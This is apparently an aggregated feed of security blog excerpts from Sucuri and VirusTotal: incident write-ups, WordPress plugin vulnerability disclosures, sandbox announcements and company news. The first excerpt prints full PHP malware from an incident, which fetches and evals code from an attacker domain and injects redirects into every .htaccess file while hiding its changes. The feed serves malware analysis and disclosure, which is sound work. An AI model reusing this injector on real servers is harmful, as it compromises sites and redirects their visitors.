.htaccess Injector on Joomla and WordPress Websites

.htaccess Injector on Joomla and WordPress WebsitesDuring the process of investigating one of our incident response cases, we found an .htaccess code injection. It had been widely spread on the website, injected into all .htaccess files and redirecting visitors to the http[:]//portal-f[.]pw/XcTyTp advertisement website.

Taking a Look at the .htaccess Injector Code

Below is the code within the ./modules/mod_widgetread_twitt/ index.php file on a Joomla website. This code is responsible for injecting the malicious redirects into the .htaccess files:

<?php echo’Wordpress ‘;$htac=file_get_contents(‘hXXp://recaptcha-in[.]pw/bash/x’);$fl=”./.htaccess”;$lastData=””;if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,”# BEGIN WORDPRESS”)){$data=$htac.”rn”.$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};$htac=file_get_contents(‘http://recaptcha-in.pw/bash/x’);$fl=”../.htaccess”;$lastData=””;if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,”# BEGIN WORDPRESS”)){$data=$htac.”rn”.$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};$htac=file_get_contents(‘http://recaptcha-in.pw/bash/x’);$fl=”../../.htaccess”;$lastData=””;if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,”# BEGIN WORDPRESS”)){$data=$htac.”rn”.$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};$htac=file_get_contents(‘http://recaptcha-in.pw/bash/x’);$fl=”../../../.htaccess”;$lastData=””;if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,”# BEGIN WORDPRESS”)){$data=$htac.”rn”.$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};$htac=file_get_contents(‘http://recaptcha-in.pw/bash/x’);$fl=”../../../../.htaccess”;$lastData=””;if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,”# BEGIN WORDPRESS”)){$data=$htac.”rn”.$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};$htac=file_get_contents(‘http://recaptcha-in.pw/bash/x’);$fl=”../../../../../.htaccess”;$lastData=””;if(file_exists($fl))$lastData=file_get_contents($fl);if(!substr_count($lastData,”# BEGIN WORDPRESS”)){$data=$htac.”rn”.$lastData;chmod($fl,0766);file_put_contents($fl,$data);touch($fl,filemtime($path));chmod($fl,0444);echo$page;};echo’ ‘;eval(file_get_contents(‘hXXp://recaptcha-in[.]pw/bash/include/xtaccess’));echo’ ‘;set_time_limit(120);$fileName=”.htaccess”;$injectData=”http://recaptcha-in.pw/bash/x”;$filesArray=array();function FindFiles($dir,&$fArray,&$searchFile){if($curdir=opendir($dir)){while(false!==($file=readdir($curdir))){if(($file==”.”)||($file==”..”))continue;$filePath=$dir.DIRECTORY_SEPARATOR.$file;if(is_file($filePath))if($file!=$searchFile)continue;if(is_dir($filePath)){FindFiles($filePath,$fArray,$searchFile);}else{array_push($fArray,$filePath);}}closedir($curdir);}return true;}FindFiles($_SERVER[“DOCUMENT_ROOT”],$filesArray,$fileName);if(count($filesArray)>0){$injectData=file_get_contents($injectData);if(!empty($injectData)){foreach($filesArray as&$value){chmod($value,0777);if(is_writable($value)){$fileDate=filemtime($value);$fileSource=file_get_contents($value);if(!strstr($fileSource,$injectData)){$fileSource=$injectData.”rn”.$fileSource;file_put_contents($value,$fileSource);touch($value,$fileDate);}}chmod($value,0444);}}};echo’

END’;

This code is searching for an .htaccess file.

Continue reading .htaccess Injector on Joomla and WordPress Websites at Sucuri Blog.

Source: Scuri check

Slimstat: Stored XSS from Visitors

Slimstat: Stored XSS from VisitorsThe WordPress Slimstat plugin, which currently has over 100k installs, allows your website to gather analytics data for your WordPress website. It will track certain information such as the browser and operating system details, plus page visits to optimize the website analytics.

Versions below 4.8.1 are affected by an unauthenticated stored XSS on the administrator dashboard.

Timeline

  • 2019/05/16: Initial disclosure
  • 2019/05/20: Patch released (4.8.1)
  • 2019/05/21: Blog post released

Details

This vulnerability allows a visitor to inject arbitrary JavasScript code on the plugin access log functionality, which is visible both on the plugin’s access log page and on the admin dashboard index—‚ the default page shown once you log in.

Continue reading Slimstat: Stored XSS from Visitors at Sucuri Blog.

Source: Scuri check

W97M/Downloader Malware Dropper Served from Compromised Websites

W97M/Downloader Malware Dropper Served from Compromised WebsitesW97M/Downloader is part of a large banking malware operation that peaked in March 2016. Bad actors have been distributing this campaign for well over a year, which serves as a doorway to Vawtrak and Dridex banking trojans. This malware campaign targets a wide array of users via their operating system and browser to deliver the appropriate payload.

W9M/Downloader Malware Campaign

W97M/Downloader is a specially-crafted Microsoft Word document that, when opened, silently executes a malicious macro that connects to multiple remote servers to download and display additional components.

Continue reading W97M/Downloader Malware Dropper Served from Compromised Websites at Sucuri Blog.

Source: Scuri check

Who is Responsible for the Security of Your Website?

Who is Responsible for the Security of Your Website?On a daily basis at Sucuri, we hear things like:

“My host takes care of my website security.”

“I have never been hacked, so why should I care?”

Or here’s a personal favorite:

“I’ll take care of it if (when) it happens.”

Let’s be honest, no one wants to think about the possibility of their site being hacked.

I have been in the website security industry for a few years now and have seen so many horror stories it’s unreal.

Continue reading Who is Responsible for the Security of Your Website? at Sucuri Blog.

Source: Scuri check

Persistent Cross-site Scripting in WP Live Chat Support Plugin

Persistent Cross-site Scripting in WP Live Chat Support PluginDuring a routine research audits for our Sucuri Firewall, we discovered an Unauthenticated Persistent Cross-Site Scripting (XSS) affecting 60,000+ users of the  WP Live Chat Support  WordPress plugin.

Current State of the Vulnerability

Though this security bug has been fixed in the 8.0.27 release, it can be exploited by an attacker without any account in the vulnerable site.

We are not aware of any exploit attempts currently using this vulnerability.

Continue reading Persistent Cross-site Scripting in WP Live Chat Support Plugin at Sucuri Blog.

Source: Scuri check

WordPress Plugin Give – Stored XSS for Donors

WordPress Plugin Give – Stored XSS for Donors​​Give is a WordPress plugin which allows users to setup a donation page on a website. It currently has 60k installs.

​​During a recent audit of the plugin, we found a severe vulnerability which allows donors to inject arbitrary code on an administrative page.

​​If you are using a version lower than 2.4.7, you should update immediately.

​​When creating a donation, all of the arguments are sanitized as text fields, but this method does not take into consideration where the variables are reflected.

Continue reading WordPress Plugin Give – Stored XSS for Donors at Sucuri Blog.

Source: Scuri check

VirusTotal += SecureAge

We welcome SecureAge APEX scanner to VirusTotal. In the words of the company:

“SecureAge APEX is an anti-malware scanning engine powered by artificial intelligence, designed to extend the detection capabilities of the SecureAge SecureAPlus endpoint protection platform (EPP). The APEX engine provides next-generation endpoint detection as part of the SecureAPlus layered approach to security which includes Application Control & Application Whitelisting, multi-cloud anti-virus, fileless attack protection and more. To deal with advanced threats like zero-day malware, the APEX engine goes beyond traditional scanners by reliably identifying unseen and mutated malware types and variants from day one of their release. The APEX engine that runs in VirusTotal targets Windows PE files; with integration into the VirusTotal ecosystem, SecureAge looks forward to further enhancing APEX’s capabilities, and above that, adding value to VirusTotal’s cybersecurity services.”

SecureAge has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by AV-Comparatives, an AMTSO-member tester.
Source: VirusTotal

Multiple Vulnerabilities in the WordPress Ultimate Member Plugin

Multiple Vulnerabilities in the WordPress Ultimate Member PluginThe Ultimate member plugin version 2.0.45 and lower is affected by multiple vulnerabilities, among them is a critical vulnerability allowing malicious users to read and delete your wp-config.php file, which can lead to a complete website takeover.

All of our clients behind our website firewall are already protected, and are not at risk.

The three vulnerabilities have the following DREAD score:

  • Arbitrary file read and delete: 8.4
  • Admin dashboard XSS: 7.4
  • User Profile XSS: 6.8

Disclosure / Response Timeline:

  • 2019/05/07: Initial disclosure
  • 2019/05/08: Partial patch released (2.0.45)
  • 2019/05/10: Complete patch released (2.0.46)

File Leak and Delete

If an admin added a File upload or Image upload input field on one of the forms (such as on the user profile), the user can use it to download any file of the server.

Continue reading Multiple Vulnerabilities in the WordPress Ultimate Member Plugin at Sucuri Blog.

Source: Scuri check

New Guide on the Sucuri Referral Program

New Guide on the Sucuri Referral ProgramReferral programs and affiliate marketing opportunities can be found on many web-based company sites, however, often they’re overlooked. Commonly people consider these programs as something that they, “should leave to the professionals”.

We designed our new Referral Program Guide to give clear insight into affiliate marketing for both beginners and long-term affiliates.  You don’t need to be an affiliate pro. We treat every member of our program the same–whether you refer hundreds of customers per month or one per year.

Continue reading New Guide on the Sucuri Referral Program at Sucuri Blog.

Source: Scuri check

Free Website Security Consultation for GoDaddy Pros

Free Website Security Consultation for GoDaddy ProsSucuri is partnering with GoDaddy Pro to make the internet more secure, one website professional at a time. Developers, designers, agencies, and freelancers now have an exclusive avenue to level up security knowledge and differentiate their businesses from the competition.

GoDaddy Pro helps web developers and designers save time and money while managing multiple websites. The free membership includes extensive training materials, automation of routine maintenance tasks, and consolidated client management tools.

Continue reading Free Website Security Consultation for GoDaddy Pros at Sucuri Blog.

Source: Scuri check

VirusTotal MultiSandbox += Yoroi: Yomi sandbox

We are excited to welcome Yomi: The Malware Hunter from Yoroi to the mutisandbox project. This brings VirusTotal upl to seven integrated sandboxes, in addition to VT’s own sandboxes for Windows, MacOS, and Android.

In their own words:

Yomi engine implements a multi-analysis approach able to exploit both static analysis and behavioral analysis, providing ad hoc analysis path for each kind of files. The static analysis section includes document and macro code extraction, imports, dependencies and trust chain analysis. The behavioral detection engine is weaponized to recognize suspicious actions the malware silently does, giving a powerful insight on command and control, exfiltration and lateral movement activities over the network, including encrypted channels. Each analysis is reported in an intuitive aggregated view to spot interesting patterns at a glance.

Some recent samples on VirusTotal with reports from Yoroi:

To see the full details click on the “Full report” within the behavior tab.


Interesting features


Executed commands
Within the Yomi Hunter report, additional information on executed commands can be seen. In this case, we see obfuscated powershell commands being run.

To search other behaviour reports for the string “zgohmskxd” we can use the behavior_processes:zgohmskxd search query to find another sample with the same variable name. Check out the other search modifiers that can be used to find similar samples.


Mutexes

Within the Additional information tab, we can also find the mutexes used by the sample under analysis. behaviour:AversSucksForever


To search other sandbox behavior reports with the same string we can search

behavior:AversSucksForever


Mitre ATT&CK™ tab

On the MITRE ATT&CK™ tab you can see how the specific behaviour is behavior is tagged


Relationships

With the emotet sample we can see the SMB and HTTP traffic. Next you can click on the relationships tab to see other related IP Addresses, Domains, URLs and files.


You can visually see these relationships from within VirusTotal Graph:

Source: VirusTotal

Persistent XSS via CSRF in WP Meta and Date Remover

Persistent XSS via CSRF in WP Meta and Date RemoverDuring regular research audits for our Sucuri Firewall (WAF), we discovered a Cross Site Request Forgery (CSRF) leading to a persistent Cross Site Scripting vulnerability affecting 70,000+ users of the WP Meta and Date Remover plugin for WordPress.

Disclosure / Response Timeline:

  • April 30 – Initial contact attempt
  • May 07 – Patch is live

Are You at Risk?

This vulnerability requires some level of social engineering to be exploited.

Continue reading Persistent XSS via CSRF in WP Meta and Date Remover at Sucuri Blog.

Source: Scuri check

VirusTotal Multisandbox += NSFOCUS POMA

We are pleased to announce that the multisandbox project has partnered with NSFOCUS POMA. This brings VirusTotal up to six integrated sandboxes. The NSFOCUS sandbox gives us insight into the behaviour of samples that run on Windows 7 and XP SP3.

In their own words:
NSFOCUS POMA, as an integral part of the NSFOCUS Threat Intelligence (NTI) system, is a cloud‐based malware analysis engine built by the NSFOCUS Security Lab. It can take various types of files and perform both static and dynamic analysis on them to detect potentially malicious behavior, and produce analytic reports in many formats (including STIX). This service can help a user to protect his environment from various threats, such as 0‐day attacks, advanced persistent threats (APTs), ransomware, botnets, cryptocurrency mining and other malware.

We are very honored and proud to bring such values to the VirusTotal users and community.

Here are a few examples:

https://www.virustotal.com/gui/file/a01b10ae6e81c4efc7c4a7b0a6c893907e4a6044b87ed72be7e5800ae104c8c8/behavior/NSFOCUS%20POMA

https://www.virustotal.com/gui/file/d7dd7c2482b3d38cd7fae5860eaa912f019a31fb4988f8320a105c9c4ca5ebbd/behavior/NSFOCUS%20POMA

https://www.virustotal.com/gui/file/430aa2f84cc7934cabdb644eccbdb9d8355899ed9665570bc80b58fd4c010150/behavior/NSFOCUS%20POMA

You can find the sandbox behaviour reports on the behavior tab.

Threat Summary

At the top of the detailed report, right away we can see a summary of the detection.

Threat Detail

Within the threat detail section we can see the behavior in both Windows XP SP3 and Windows 7 SP1 ordered by risk, most important at the top.

Registry actions:

Within the behaviour report we can see an interesting UUID


Using  a behavior search in VT Intelligence, we can find other samples that also use this same UUID



Connecting the dots

In the sample we can see the relationship with the IP address 185[.]45[.]252[.]36




Within VTGraph we can visually see the relationships between this sample, the IP address, domains and URLS that we know about


Source: VirusTotal

Replica Spam on Poorly Maintained ASP Site

Replica Spam on Poorly Maintained ASP SiteAlthough the majority of sites we work on are powered by PHP, we still have clients whose sites use other programming languages.

The other day we cleaned an ASP site where we found a web.config file (the ASP.NET version of .htaccess) with these instructions:

<configuration>

   <system.webServer>

       <defaultDocument enabled=”true”>

           <files>

               <clear />

               <add value=”view.asp” />

               <add value=”Default.asp” />

               <add value=”index.htm” />

               <add value=”index.html” />

               <add value=”iisstart.htm” />

               <add value=”default.aspx” />

               <add value=”index.asp” />

               <add value=”index.aspx” />

           </files>

       </defaultDocument>

Continue reading Replica Spam on Poorly Maintained ASP Site at Sucuri Blog.

Source: Scuri check

Cronjob Backdoors

Cronjob BackdoorsAttackers commonly rely on backdoors to easily gain reentry and maintain control over a website. They also use PHP functions to further deepen the level of their backdoors.

A good example of this is the shell_exec function which allows plain shell commands to be run directly through the web application, providing attackers with an increased level of control over the environment.

Backdoor in Cron

While investigating a client with repeated website infections, we came across a scenario where a cron job was being used to reinfect the site.

Continue reading Cronjob Backdoors at Sucuri Blog.

Source: Scuri check

How Stolen Ecommerce Data is Sold on the Darknet

How Stolen Ecommerce Data is Sold on the DarknetWe have recently published posts regarding banking malware and some of the ways it uses compromised websites to infect victim’s devices (smartphones, computers, POS terminals).

Now let us look into some of the methods that cybercriminals use to monetize stolen information like bank accounts, credit cards, and personal information.

Infected Ecommerce Website to Darknet Markets

It’s important to note that one of the most popular topics discussed among cybercriminals is their opsec (operations security).

Continue reading How Stolen Ecommerce Data is Sold on the Darknet at Sucuri Blog.

Source: Scuri check

Insufficient Privilege Validation in WooCommerce Checkout Manager

Insufficient Privilege Validation in WooCommerce Checkout ManagerDue to the poor handling of a vulnerability disclosure, a new attack vector has appeared for the WooCommerce Checkout Manager WordPress plugin and is affecting over 60,000 sites. If you are using this plugin, we recommend that you update it to version 4.3 immediately.

As we’ve seen some exploit attempts occurring in the wild, we feel it is a good time to describe what the issue is.

Current State of the Vulnerability

This arbitrary file upload vulnerability was made public a few weeks ago and has recently been patched.

Continue reading Insufficient Privilege Validation in WooCommerce Checkout Manager at Sucuri Blog.

Source: Scuri check

Typo 3 Spam Infection

Typo 3 Spam InfectionHere at Sucuri most of the malware that we deal with is on CMS platforms like:

  • WordPress,
  • Joomla,
  • Drupal,
  • Magento,
  • and others.

But every now and then we come across something a little different.

Blackhat SEO Infection in Typo3

Just recently, I discovered a website using the Typo3 CMS that had been infected with a blackhat SEO spam infection:

Typo3 CMS

Before I begin, according to websitesetup.org, Typo3 is currently the 8th most widely used CMS platform on the web, so I’m surprised I had never seen an infection with this software before, but it looks like over half a million websites on the web use Typo3.

Continue reading Typo 3 Spam Infection at Sucuri Blog.

Source: Scuri check

Plugins Added to Malicious Campaign

Plugins Added to Malicious CampaignWe continue to see an increase in the number of plugins attacked as part of a campaign that’s been active for quite a long time. Bad actors have added more vulnerable plugins to inject similar malicious scripts.

Plugins Added to the Attack

  • Download WP Inventory Manager (version <= 1.8.2)
  • Woocommerce User Email Verification.  (version <= 3.3.0  **Still Not Fixed**)

Attackers are trying to exploit vulnerable versions of these plugins.

Continue reading Plugins Added to Malicious Campaign at Sucuri Blog.

Source: Scuri check

Sucuri’s 10th Anniversary

Sucuri’s 10th AnniversaryIt feels like yesterday, but it has been 10 years since the domain sucuri.net was registered.

Happy 10th Birthday, Sucuri!

For us, 2009 marks the birth of the brand as it represents the day when the open-source project secured its name. The first Sucuri service was originally called NBIM (Network Based Integrity Monitoring).

Sucuri intended to be an interface for the NBIM project. It allowed anyone to monitor websites for changes in content, WHOIS & DNS.

Continue reading Sucuri’s 10th Anniversary at Sucuri Blog.

Source: Scuri check